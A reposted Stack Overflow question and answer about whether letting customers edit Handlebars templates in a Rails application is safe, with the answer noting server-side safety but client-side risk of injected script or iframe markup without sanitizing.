问题
The Rails application that I am building need to allow the users to edit the page template.
The main concern is about how safe it is to allow the customers edit the templates. So that puts the erb templates out of the equation.
I had looked at liquid markup and Handlebars.js. There is a nice Rails integration for handlebars here https://github.com/jamesarosen/handlebars-rails .
I would prefer to use handlebars. Can somebody confirm if it is safe to let customers edit handlebar templates?
回答1:
Since Handlebars.js doesn't contain any Ruby code that needs to be evaled — yes, it's safe for server side.
Since Handlebars.js (as any other templating engine) allows user to change HTML markup (insert <script>, <iframe>) — no, it's not safe for client side (unless you have some additional sanitizing)
来源:https://stackoverflow.com/questions/9946416/how-safe-is-to-allow-customer-edit-handlebar-js-template